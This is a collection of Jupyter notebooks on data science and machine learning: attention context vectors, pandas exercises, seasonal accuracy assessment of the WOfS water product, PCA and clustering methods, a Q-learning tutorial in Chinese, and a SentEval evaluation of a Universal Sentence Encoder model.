<img src="images/Context_vector.png" />
```
def apply_attention_scores(attention_weights, annotations):
# TODO: Multiple the annotations by their weights
return
applied_attention = apply_attention_scores(attention_weights, annotations)
applied_attention
```
Let's visualize how the context vector looks now that we've applied the attention scores back on it:
```
# Let's visualize our annotations after applying attention to them
ax = sns.heatmap(applied_attention, annot=True, cmap=sns.light_palette("orange", as_cmap=True), linewidths=1)
```
Contrast this with the raw annotations visualized earlier in the notebook, and we can see that the second and third annotations (columns) have been nearly wiped out. The first annotation maintains some of its value, and the fourth annotation is the most pronounced.
# Calculating the Attention Context Vector
All that remains to produce our attention context vector now is to sum up the four columns to produce a single attention context vector
```
def calculate_attention_vector(applied_attention):
return np.sum(applied_attention, axis=1)
attention_vector = calculate_attention_vector(applied_attention)
attention_vector
# Let's visualize the attention context vector
plt.figure(figsize=(1.5, 4.5))
sns.heatmap(np.transpose(np.matrix(attention_vector)), annot=True, cmap=sns.light_palette("Blue", as_cmap=True), linewidths=1)
```
Now that we have the context vector, we can concatenate it with the hidden state and pass it through a hidden layer to produce the the result of this decoding time step.
|
github_jupyter
|
# Introduction to Pandas
Complete the following set of exercises to solidify your knowledge of Pandas fundamentals.
#### 1. Import Numpy and Pandas and alias them to `np` and `pd` respectively.
```
# your code here
import numpy as np
import pandas as pd
```
#### 2. Create a Pandas Series containing the elements of the list below.
```
lst = [5.7, 75.2, 74.4, 84.0, 66.5, 66.3, 55.8, 75.7, 29.1, 43.7]
# your code here
lstseries = pd.Series(lst)
print(lstseries)
```
#### 3. Use indexing to return the third value in the Series above.
*Hint: Remember that indexing begins at 0.*
```
# your code here
print(lstseries[2])
```
#### 4. Create a Pandas DataFrame from the list of lists below. Each sublist should be represented as a row.
```
b = [[53.1, 95.0, 67.5, 35.0, 78.4],
[61.3, 40.8, 30.8, 37.8, 87.6],
[20.6, 73.2, 44.2, 14.6, 91.8],
[57.4, 0.1, 96.1, 4.2, 69.5],
[83.6, 20.5, 85.4, 22.8, 35.9],
[49.0, 69.0, 0.1, 31.8, 89.1],
[23.3, 40.7, 95.0, 83.8, 26.9],
[27.6, 26.4, 53.8, 88.8, 68.5],
[96.6, 96.4, 53.4, 72.4, 50.1],
[73.7, 39.0, 43.2, 81.6, 34.7]]
# your code here
bdf = pd.DataFrame(b)
print(bdf)
```
#### 5. Rename the data frame columns based on the names in the list below.
```
colnames = ['Score_1', 'Score_2', 'Score_3', 'Score_4', 'Score_5']
# your code here
bdf.columns = colnames
print(bdf)
```
#### 6. Create a subset of this data frame that contains only the Score 1, 3, and 5 columns.
```
# your code here
newbdf = bdf[['Score_1','Score_3','Score_5']]
print(newbdf)
```
#### 7. From the original data frame, calculate the average Score_3 value.
```
# your code here
bdf['Score_3'].mean()
```
#### 8. From the original data frame, calculate the maximum Score_4 value.
```
# your code here
bdf['Score_4'].max()
```
#### 9. From the original data frame, calculate the median Score 2 value.
```
# your code here
bdf['Score_2'].median()
```
#### 10. Create a Pandas DataFrame from the dictionary of product orders below.
```
orders = {'Description': ['LUNCH BAG APPLE DESIGN',
'SET OF 60 VINTAGE LEAF CAKE CASES ',
'RIBBON REEL STRIPES DESIGN ',
'WORLD WAR 2 GLIDERS ASSTD DESIGNS',
'PLAYING CARDS JUBILEE UNION JACK',
'POPCORN HOLDER',
'BOX OF VINTAGE ALPHABET BLOCKS',
'PARTY BUNTING',
'JAZZ HEARTS ADDRESS BOOK',
'SET OF 4 SANTA PLACE SETTINGS'],
'Quantity': [1, 24, 1, 2880, 2, 7, 1, 4, 10, 48],
'UnitPrice': [1.65, 0.55, 1.65, 0.18, 1.25, 0.85, 11.95, 4.95, 0.19, 1.25],
'Revenue': [1.65, 13.2, 1.65, 518.4, 2.5, 5.95, 11.95, 19.8, 1.9, 60.0]}
# your code here
ordersdf = pd.DataFrame(orders)
# x.head()
print(ordersdf)
```
#### 11. Calculate the total quantity ordered and revenue generated from these orders.
```
# your code here
total_qty = ordersdf['Quantity'].sum()
print(total_qty)
total_revenue = ordersdf['Revenue'].sum()
print(total_revenue)
```
#### 12. Obtain the prices of the most expensive and least expensive items ordered and print the difference.
```
# your code here
expensive = ordersdf['UnitPrice'].max()
print(expensive)
affordable = ordersdf['UnitPrice'].min()
print(affordable)
diff = expensive - affordable
print(diff)
```
|
github_jupyter
|
# Seasonal Accuracy Assessment of Water Observations from Space (WOfS) Product in Africa<img align="right" src="../Supplementary_data/DE_Africa_Logo_Stacked_RGB_small.jpg">
## Description
Now that we have run WOfS classification for each AEZs in Africa, its time to conduct seasonal accuracy assessment for each AEZ in Africa which is already compiled and stored in the following folder:`Results/WOfS_Assessment/Point_Based/ValidPoints_Per_AEZ`.
Accuracy assessment for WOfS product in Africa includes generating a confusion error matrix for a WOFL binary classification.
The inputs for the estimating the accuracy of WOfS derived product are a binary classification WOFL layer showing water/non-water and a shapefile containing validation points collected by [Collect Earth Online](https://collect.earth/) tool. Validation points are the ground truth or actual data while the extracted value for each location from WOFL is the predicted value.
This notebook will explain how you can perform seasonal accuracy assessment for WOfS starting with `Western` AEZ using collected ground truth dataset. It will output a confusion error matrix containing overall, producer's and user's accuracy, along with the F1 score for each class.
## Getting started
To run this analysis, run all the cells in the notebook, starting with the "Load packages" cell.
### Load packages
Import Python packages that are used for the analysis.
```
%matplotlib inline
import sys
import os
import rasterio
import xarray
import glob
import numpy as np
import pandas as pd
import seaborn as sn
import geopandas as gpd
import matplotlib.pyplot as plt
import scipy, scipy.ndimage
import warnings
warnings.filterwarnings("ignore") #this will suppress the warnings for multiple UTM zones in your AOI
sys.path.append("../Scripts")
from geopandas import GeoSeries, GeoDataFrame
from shapely.geometry import Point
from sklearn.metrics import confusion_matrix, accuracy_score
from sklearn.metrics import plot_confusion_matrix, f1_score
from deafrica_plotting import map_shapefile,display_map, rgb
from deafrica_spatialtools import xr_rasterize
from deafrica_datahandling import wofs_fuser, mostcommon_crs,load_ard,deepcopy
from deafrica_dask import create_local_dask_cluster
```
### Analysis Parameters
- CEO : groundtruth points containing valid points in each AEZ containing WOfS assigned classes, WOfS clear observations and the labels identified by analyst in each calendar month
- input_data : dataframe for further analysis and accuracy assessment
### Load the Dataset
Validation points that are valid for each AEZ
```
#Read the valid ground truth data
CEO = 'Results/WOfS_Assessment/Point_Based/ValidPoints_Per_AEZ/ValidationPoints_Western.csv'
df = pd.read_csv(CEO,delimiter=",")
#explore the dataframe
df.columns
#rename a column in dataframe
input_data = df.drop(['Unnamed: 0'], axis=1)
input_data = input_data.rename(columns={'WATERFLAG':'ACTUAL'})
#The table contains each calendar month as well as CEO and WOfS lables for each validation points
input_data
#Counting the number of rows in valid points dataframe
count = input_data.groupby('PLOT_ID',as_index=False,sort=False).last()
count
```
From the table, choose those rows that are in Wet season and also choose those in Dry season, then save them in separate tables.
```
#setting the months that are identified as wet in the AEZ using Climatology dataset
WetMonth = [5,6,7,8,9,10]
#identifying the points that are in wet season and counting their numbers
Wet_Season = input_data[input_data['MONTH'].isin(WetMonth)]
count_Wet_Season = Wet_Season.groupby('PLOT_ID',as_index=False,sort=False).last()
count_Wet_Season
#setting the months that are identified as dry in the AEZ using Climatology dataset then counting the points that are in dry season
Dry_Season = input_data[~input_data['MONTH'].isin(WetMonth)]
count_Dry_Season = Dry_Season.groupby('PLOT_ID',as_index=False,sort=False).last()
count_Dry_Season
```
Some points are in both dry and wet seasons as the number of points show.
### Create a Confusion Matrix
```
confusion_matrix = pd.crosstab(Wet_Season['ACTUAL'],Wet_Season['PREDICTION'],rownames=['ACTUAL'],colnames=['PREDICTION'],margins=True)
confusion_matrix
```
`Producer's Accuracy` is the map-maker accuracy showing the probability that a certain class on the ground is classified. Producer's accuracy complements error of omission.
```
confusion_matrix["Producer's"] = [confusion_matrix.loc[0][0] / confusion_matrix.loc[0]['All'] * 100, confusion_matrix.loc[1][1] / confusion_matrix.loc[1]['All'] *100, np.nan]
confusion_matrix
```
`User's Accuracy` is the map-user accuracy showing how often the class on the map will actually be present on the ground. `User's accuracy` shows the reliability. It is calculated based on the total number of correct classification for a particular class over the total number of classified sites.
```
users_accuracy = pd.Series([confusion_matrix[0][0] / confusion_matrix[0]['All'] * 100,
confusion_matrix[1][1] / confusion_matrix[1]['All'] * 100]).rename("User's")
confusion_matrix = confusion_matrix.append(users_accuracy)
confusion_matrix
```
`Overal Accuracy` shows what proportion of reference(actual) sites mapped correctly.
```
confusion_matrix.loc["User's", "Producer's"] = (confusion_matrix[0][0] + confusion_matrix[1][1]) / confusion_matrix['All']['All'] * 100
confusion_matrix
input_data['PREDICTION'] = input_data['PREDICTION'] .astype(str).astype(int)
```
The F1 score is the harmonic mean of the precision and recall, where an F1 score reaches its best value at 1(perfect precision and recall), and is calculated as:
```
fscore = pd.Series([(2*(confusion_matrix.loc["User's"][0]*confusion_matrix.loc[0]["Producer's"]) / (confusion_matrix.loc["User's"][0] + confusion_matrix.loc[0]["Producer's"])) / 100,
f1_score(input_data['ACTUAL'],input_data['PREDICTION'])]).rename("F-score")
confusion_matrix = confusion_matrix.append(fscore)
confusion_matrix
confusion_matrix = confusion_matrix.round(decimals=2)
confusion_matrix = confusion_matrix.rename(columns={'0':'NoWater','1':'Water', 0:'NoWater',1:'Water','All':'Total'},index={'0':'NoWater','1':'Water',0:'NoWater',1:'Water','All':'Total'})
confusion_matrix
confusion_matrix.to_csv('../Results/WOfS_Assessment/Point_Based/ConfusionMatrix/Western_WetSeason_confusion_matrix.csv')
```
***
## Additional information
**License:** The code in this notebook is licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0).
Digital Earth Africa data is licensed under the [Creative Commons by Attribution 4.0](https://creativecommons.org/licenses/by/4.0/) license.
**Contact:** If you need assistance, please post a question on the [Open Data Cube Slack channel](http://slack.opendatacube.org/) or on the [GIS Stack Exchange](https://gis.stackexchange.com/questions/ask?tags=open-data-cube) using the `open-data-cube` tag (you can view previously asked questions [here](https://gis.stackexchange.com/questions/tagged/open-data-cube)).
If you would like to report an issue with this notebook, you can file one on [Github](https://github.com/digitalearthafrica/deafrica-sandbox-notebooks).
**Last modified:** January 2020
**Compatible datacube version:**
## Tags
Browse all available tags on the DE Africa User Guide's [Tags Index](https://) (placeholder as this does not exist yet)
|
github_jupyter
|
## Principal Component Analysis
```
# Import numpy
import numpy as np
# Import linear algebra module
from scipy import linalg as la
# Create dataset
data=np.array([[7., 4., 3.],
[4., 1., 8.],
[6., 3., 5.],
[8., 6., 1.],
[8., 5., 7.],
[7., 2., 9.],
[5., 3., 3.],
[9., 5., 8.],
[7., 4., 5.],
[8., 2., 2.]])
# 1. Calculate the covariance matrix
# Center your data
data -= data.mean(axis=0)
cov = np.cov(data, rowvar=False)
# 2. Calculate eigenvalues and eigenvector of the covariance matrix
evals, evecs = la.eig(cov)
print("Eigenvalues:", evals)
print("Eigenvector:", evecs)
# 3. Multiply the original data matrix with Eigenvector matrix.
# Sort the Eigen values and vector and select components
num_components=2
sorted_key = np.argsort(evals)[::-1][:num_components]
evals, evecs = evals[sorted_key], evecs[:, sorted_key]
print("Sorted and Selected Eigen Values:", evals)
print("Sorted and Selected Eigen Vector:", evecs)
# Multiply original data and Eigen vector
principal_components=np.dot(data,evecs)
print("Principal Components:", principal_components)
# Import pandas and PCA
import pandas as pd
# Import principal component analysis
from sklearn.decomposition import PCA
# Create dataset
data=np.array([[7., 4., 3.],
[4., 1., 8.],
[6., 3., 5.],
[8., 6., 1.],
[8., 5., 7.],
[7., 2., 9.],
[5., 3., 3.],
[9., 5., 8.],
[7., 4., 5.],
[8., 2., 2.]])
# Create and fit PCA Model
pca_model = PCA(n_components=2)
components = pca_model.fit_transform(data)
components_df = pd.DataFrame(data = components,
columns = ['principal_component_1', 'principal_component_2'])
print(components_df)
```
## Finding Number of Clusters
### The Elbow Method
```
# import pandas
import pandas as pd
# import matplotlib
import matplotlib.pyplot as plt
# import K-means
from sklearn.cluster import KMeans
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
wcss_list = []
# Run a loop for different value of number of cluster
for i in range(1, 6):
# Create and fit the KMeans model
kmeans_model = KMeans(n_clusters = i, random_state = 123)
kmeans_model.fit(data)
# Add the WCSS or inertia of the clusters to the score_list
wcss_list.append(kmeans_model.inertia_)
# Plot the inertia(WCSS) and number of clusters
plt.plot(range(1, 6), wcss_list, marker='*')
# set title of the plot
plt.title('Selecting Optimum Number of Clusters using Elbow Method')
# Set x-axis label
plt.xlabel('Number of Clusters K')
# Set y-axis label
plt.ylabel('Within-Cluster Sum of the Squares(Inertia)')
# Display plot
plt.show()
```
### Silhouette Method
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# import k-means for performing clustering
from sklearn.cluster import KMeans
# import silhouette score
from sklearn.metrics import silhouette_score
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
score_list = []
# Run a loop for different value of number of cluster
for i in range(2, 6):
# Create and fit the KMeans model
kmeans_model = KMeans(n_clusters = i, random_state = 123)
kmeans_model.fit(data)
# Make predictions
pred=kmeans_model.predict(data)
# Calculate the Silhouette Score
score = silhouette_score (data, pred, metric='euclidean')
# Add the Silhouette score of the clusters to the score_list
score_list.append(score)
# Plot the Silhouette score and number of cluster
plt.bar(range(2, 6), score_list)
# Set title of the plot
plt.title('Silhouette Score Plot')
# Set x-axis label
plt.xlabel('Number of Clusters K')
# Set y-axis label
plt.ylabel('Silhouette Scores')
# Display plot
plt.show()
```
## K-Means Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import K-means
from sklearn.cluster import KMeans
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# Define number of clusters
num_clusters = 2
# Create and fit the KMeans model
km = KMeans(n_clusters=num_clusters)
km.fit(data)
# Predict the target variable
pred=km.predict(data)
# Plot the Clusters
plt.scatter(data.X,data.Y,c=pred, marker="o", cmap="bwr_r")
# Set title of the plot
plt.title('K-Means Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
## Hierarchical Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import dendrogram
from scipy.cluster.hierarchy import dendrogram
from scipy.cluster.hierarchy import linkage
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# create dendrogram using ward linkage
dendrogram_plot = dendrogram(linkage(data, method = 'ward'))
# Set title of the plot
plt.title('Hierarchical Clustering: Dendrogram')
# Set x-axis label
plt.xlabel('Data Items')
# Set y-axis label
plt.ylabel('Distance')
# Display the plot
plt.show()
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import Agglomerative Clustering
from sklearn.cluster import AgglomerativeClustering
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# Specify number of clusters
num_clusters = 2
# Create agglomerative clustering model
ac = AgglomerativeClustering(n_clusters = num_clusters, linkage='ward')
# Fit the Agglomerative Clustering model
ac.fit(data)
# Predict the target variable
pred=ac.labels_
# Plot the Clusters
plt.scatter(data.X,data.Y,c=pred, marker="o")
# Set title of the plot
plt.title('Agglomerative Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
## DBSCAN Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import DBSCAN clustering model
from sklearn.cluster import DBSCAN
# import make_moons dataset
from sklearn.datasets import make_moons
# Generate some random moon data
features, label = make_moons(n_samples = 2000)
# Create DBSCAN clustering model
db = DBSCAN()
# Fit the Spectral Clustering model
db.fit(features)
# Predict the target variable
pred_label=db.labels_
# Plot the Clusters
plt.scatter(features[:, 0], features[:, 1], c=pred_label, marker="o",cmap="bwr_r")
# Set title of the plot
plt.title('DBSCAN Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
## Spectral Clustering
```
# import pandas
import pandas as pd
# import matplotlib for data visualization
import matplotlib.pyplot as plt
# Import Spectral Clustering
from sklearn.cluster import SpectralClustering
# Create a DataFrame
data=pd.DataFrame({"X":[12,15,18,10,8,9,12,20],
"Y":[6,16,17,8,7,6,9,18]})
# Specify number of clusters
num_clusters = 2
# Create Spectral Clustering model
sc=SpectralClustering(num_clusters, affinity='rbf', n_init=100, assign_labels='discretize')
# Fit the Spectral Clustering model
sc.fit(data)
# Predict the target variable
pred=sc.labels_
# Plot the Clusters
plt.scatter(data.X,data.Y,c=pred, marker="o")
# Set title of the plot
plt.title('Spectral Clustering')
# Set x-axis label
plt.xlabel('X-Axis Values')
# Set y-axis label
plt.ylabel('Y-Axis Values')
# Display the plot
plt.show()
```
## Cluster Performance Evaluation
```
# Import libraries
import pandas as pd
# read the dataset
diabetes = pd.read_csv("diabetes.csv")
# Show top 5-records
diabetes.head()
# split dataset in two parts: feature set and target label
feature_set = ['pregnant', 'insulin', 'bmi', 'age','glucose','bp','pedigree']
features = diabetes[feature_set]
target = diabetes.label
# partition data into training and testing set
from sklearn.model_selection import train_test_split
feature_train, feature_test, target_train, target_test = train_test_split(features, target, test_size=0.3, random_state=1)
# Import K-means Clustering
from sklearn.cluster import KMeans
# Import metrics module for performance evaluation
from sklearn.metrics import davies_bouldin_score
from sklearn.metrics import silhouette_score
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import jaccard_score
from sklearn.metrics import f1_score
from sklearn.metrics import fowlkes_mallows_score
# Specify the number of clusters
num_clusters = 2
# Create and fit the KMeans model
km = KMeans(n_clusters=num_clusters)
km.fit(feature_train)
# Predict the target variable
predictions=km.predict(feature_test)
# Calculate internal performance evaluation measures
print("Davies-Bouldin Index:", davies_bouldin_score(feature_test, predictions))
print("Silhouette Coefficient:", silhouette_score(feature_test, predictions))
# Calculate External performance evaluation measures
print("Adjusted Rand Score:", adjusted_rand_score(target_test, predictions))
print("Jaccard Score:", jaccard_score(target_test, predictions))
print("F-Measure(F1-Score):", f1_score(target_test, predictions))
print("Fowlkes Mallows Score:", fowlkes_mallows_score(target_test, predictions))
```
|
github_jupyter
|
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#定义系统参数" data-toc-modified-id="定义系统参数-1"><span class="toc-item-num">1 </span>定义系统参数</a></span></li><li><span><a href="#Q表的创建函数,初始化为0" data-toc-modified-id="Q表的创建函数,初始化为0-2"><span class="toc-item-num">2 </span>Q表的创建函数,初始化为0</a></span></li><li><span><a href="#策略" data-toc-modified-id="策略-3"><span class="toc-item-num">3 </span>策略</a></span></li><li><span><a href="#和环境的交互" data-toc-modified-id="和环境的交互-4"><span class="toc-item-num">4 </span>和环境的交互</a></span></li><li><span><a href="#更新环境" data-toc-modified-id="更新环境-5"><span class="toc-item-num">5 </span>更新环境</a></span></li><li><span><a href="#游戏的实现" data-toc-modified-id="游戏的实现-6"><span class="toc-item-num">6 </span>游戏的实现</a></span></li><li><span><a href="#执行强化学习训练" data-toc-modified-id="执行强化学习训练-7"><span class="toc-item-num">7 </span>执行强化学习训练</a></span></li></ul></div>
Q-Learning是增强学习中model free的的重要算法,其基本思想是通过Q表记录并更新状态-行动的价值,使得最后获得一个“完美”的Q表:当agent处于任意状态时,查询该Q表即可获知如何行动。
下面通过一个非常简单的小例子来说明Q Learning的思想(本案例主要参考了: https://morvanzhou.github.io/tutorials/ )。这是一个来自一维世界的agent,它只能在一个固定长度的线段上左右运动,每次只能运动一格,当运动到线段的最右边时才会获得奖励:+1的reward。初始时,agent位于线段的最左边,它并不知道在线段的最右边有个“宝物”可以获得reward。
下面的一篇文章可以参考:https://blog.csdn.net/Young_Gy/article/details/73485518
```
import numpy as np
import pandas as pd
import time
```
## 定义系统参数
```
N_STATES = 6 # the length of the 1 dimensional world
ACTIONS = ['left', 'right'] # available actions
EPSILON = 0.9 # greedy police,这里的意思是,即便在Q表中有对应的(最佳)Q价值,也有10%的概率随机选取action
ALPHA = 0.1 # learning rate
GAMMA = 0.9 # discount factor
MAX_EPISODES = 7 # maximum episodes
FRESH_TIME = 0.01 # fresh time for one move
TERMINAL='bang' # 终止状态,当agent遇到最右边的宝物时设置此状态
DEBUG=True # 调试时设置为True则打印更多的信息
```
## Q表的创建函数,初始化为0
本案例Q表的结构如下,其中最左边的一列是状态,本案例有6个状态,即agent可以在6个格子内左右移动:
| |left|right|
|---|---|---|
|0|0|0|
|1|0|0|
|2|0|0|
|3|0|0|
|4|0|0|
|5|0|0|
```
def build_q_table(n_states, actions):
table = pd.DataFrame(
np.zeros((n_states, len(actions))), # q_table initial values
columns=actions, # actions's name
)
print(table) # show table
return table
```
## 策略
这是增强学习中的策略部分,这里的策略很简单:如果平均随机采样值大于设定的epsilon或者当前状态的所有动作价值为0则随机游走探索(随机选取动作),否则从Q表选取价值最大的动作。我们的目标是不断优化Q表中的动作价值。
```
def choose_action(state, q_table):
# This is how to choose an action
state_actions = q_table.iloc[state, :]
# 如果当前状态的所有动作的价值为0,则随机选取动作
# 如果平均随机采样值 > EPSILON,则随机选取动作
if (np.random.uniform() > EPSILON) or ((state_actions == 0).all()):
action_name = np.random.choice(ACTIONS)
else: # act greedy
action_name = state_actions.idxmax()
return action_name
```
## 和环境的交互
环境接受agent的action并执行之,然后给出下一个状态和相应的reward。只有agent走到了最右边,环境才给予+1的reward,其他情况下reward=0。
```
def get_env_feedback(S, A):
# This is how agent will interact with the environment
# S_: next status
# R: reward to action A
if A == 'right': # move right
if S == N_STATES - 2: # terminate
S_ = TERMINAL
R = 1
else:
S_ = S + 1
R = 0
else: # move left
R = 0
if S == 0:
S_ = S # reach the wall
else:
S_ = S - 1
return S_, R
```
## 更新环境
这是agent和环境交互的一部分,绘制环境。
```
def update_env(S, episode, step_counter):
# This is how environment be updated
env_list = ['-']*(N_STATES-1) + ['T'] # '---------T' our environment
if S == TERMINAL:
interaction = 'Episode %s: total_steps = %s' % (episode+1, step_counter)
print('\r{}'.format(interaction), end='')
time.sleep(2)
print('\r ', end='')
else:
env_list[S] = 'o'
interaction = ''.join(env_list)
print('\r{}'.format(interaction), end='')
time.sleep(FRESH_TIME)
```
## 游戏的实现
rl = reinforcement learning
这里重点区分两个概念:
* q_predict,Q预测,即当前(S,A)在Q表中的值(简称Q价值),表达了在S状态下如果采取A动作的价值多少。这是在环境还没有接收并执行A动作时的Q价值,即此时A动作还没有真正执行,因此是一个预测值,或者说是上一轮(S,A)后的Q真实,如果存在上一轮的话。
* q_target,Q真实,即(S,A)执行后的Q价值:环境接收并执行了A动作,给出了S_(下一个动作)和R(reward),则根据Q Learning算法的更新公式可计算q_target。之所以叫做Q真实,是因为这个时候A动作已经被环境执行了,这是确凿发生的事实产生的Q价值。
画个图来进一步理解:

下图说明了Q Learning的算法(see: https://www.cse.unsw.edu.au/~cs9417ml/RL1/algorithms.html ):

```
def rl():
# main part of RL loop
q_table = build_q_table(N_STATES, ACTIONS)
for episode in range(MAX_EPISODES):
step_counter = 0
S = 0
is_terminated = False
update_env(S, episode, step_counter)
while not is_terminated:
A = choose_action(S, q_table)
# Q表中当前(S,A)对应的值称为Q预测,即当前的(S,A)组合的价值。
q_predict = q_table.loc[S, A]
S_, R = get_env_feedback(S, A) # take action & get next state and reward
if S_ != TERMINAL:
q_target = R + GAMMA * q_table.iloc[S_, :].max() # next state is not terminal
else:
q_target = R # next state is terminal
is_terminated = True # terminate this episode
q_table.loc[S, A] = q_predict + ALPHA * (q_target - q_predict) # update
if DEBUG == True and q_target != q_predict:
print(' %s episode,S(%s),A(%s),R(%.6f),S_(%s),q_p(%.6f),q_t(%.6f),q_tab[S,A](%.6f)' % (episode,S,A,R,S_,q_predict,q_target,q_table.loc[S,A]))
#print(q_table)
S = S_ # move to next state
update_env(S, episode, step_counter+1)
step_counter += 1
return q_table
```
## 执行强化学习训练
遗憾的是,还不知道在jupyter中如何不换行持续显示训练的过程,请高手指点。目前可以通过打开DEBUG开关观察agent的训练过程。
```
q_table = rl()
print('\r\nQ-table after training:\n')
print(q_table)
```
|
github_jupyter
|
**Copyright 2021 The TensorFlow Hub Authors.**
Licensed under the Apache License, Version 2.0 (the "License");
```
# Copyright 2021 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
```
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/hub/blob/master/examples/colab/senteval_for_universal_sentence_encoder_cmlm.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/hub/blob/master/examples/colab/senteval_for_universal_sentence_encoder_cmlm.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/hub/examples/colab/senteval_for_universal_sentence_encoder_cmlm.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
<td>
<a href="https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1"><img src="https://www.tensorflow.org/images/hub_logo_32px.png" />See TF Hub model</a>
</td>
</table>
#Universal Sentence Encoder SentEval demo
This colab demostrates the [Universal Sentence Encoder CMLM model](https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1) using the [SentEval](https://github.com/facebookresearch/SentEval) toolkit, which is a library for measuring the quality of sentence embeddings. The SentEval toolkit includes a diverse set of downstream tasks that are able to evaluate the generalization power of an embedding model and to evaluate the linguistic properties encoded.
Run the first two code blocks to setup the environment, in the third code block you can pick a SentEval task to evaluate the model. A GPU runtime is recommended to run this Colab.
To learn more about the Universal Sentence Encoder CMLM model, see https://openreview.net/forum?id=WDVD4lUCTzU.
```
#@title Install dependencies
!pip install --quiet tensorflow_text==2.7.3
!pip install --quiet torch==1.8.1
```
## Download SentEval and task data
This step download SentEval from github and execute the data script to download the task data. It may take up to 5 minutes to complete.
```
#@title Install SentEval and download task data
!rm -rf ./SentEval
!git clone https://github.com/facebookresearch/SentEval.git
!cd $PWD/SentEval/data/downstream && bash get_transfer_data.bash > /dev/null 2>&1
```
#Execute a SentEval evaulation task
The following code block executes a SentEval task and output the results, choose one of the following tasks to evaluate the USE CMLM model:
```
MR CR SUBJ MPQA SST TREC MRPC SICK-E
```
Select a model, params and task to run. The rapid prototyping params can be used for reducing computation time for faster result.
It typically takes 5-15 mins to complete a task with the **'rapid prototyping'** params and up to an hour with the **'slower, best performance'** params.
```
params = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5}
params['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2}
```
For better result, use the slower **'slower, best performance'** params, computation may take up to 1 hour:
```
params = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 10}
params['classifier'] = {'nhid': 0, 'optim': 'adam', 'batch_size': 16,
'tenacity': 5, 'epoch_size': 6}
```
```
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import sys
sys.path.append(f'{os.getcwd()}/SentEval')
import tensorflow as tf
# Prevent TF from claiming all GPU memory so there is some left for pytorch.
gpus = tf.config.list_physical_devices('GPU')
if gpus:
# Memory growth needs to be the same across GPUs.
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
import tensorflow_hub as hub
import tensorflow_text
import senteval
import time
PATH_TO_DATA = f'{os.getcwd()}/SentEval/data'
MODEL = 'https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1' #@param ['https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1', 'https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-large/1']
PARAMS = 'rapid prototyping' #@param ['slower, best performance', 'rapid prototyping']
TASK = 'CR' #@param ['CR','MR', 'MPQA', 'MRPC', 'SICKEntailment', 'SNLI', 'SST2', 'SUBJ', 'TREC']
params_prototyping = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5}
params_prototyping['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2}
params_best = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 10}
params_best['classifier'] = {'nhid': 0, 'optim': 'adam', 'batch_size': 16,
'tenacity': 5, 'epoch_size': 6}
params = params_best if PARAMS == 'slower, best performance' else params_prototyping
preprocessor = hub.KerasLayer(
"https://tfhub.dev/tensorflow/bert_en_uncased_preprocess/3")
encoder = hub.KerasLayer(
"https://tfhub.dev/google/universal-sentence-encoder-cmlm/en-base/1")
inputs = tf.keras.Input(shape=tf.shape(''), dtype=tf.string)
outputs = encoder(preprocessor(inputs))
model = tf.keras.Model(inputs=inputs, outputs=outputs)
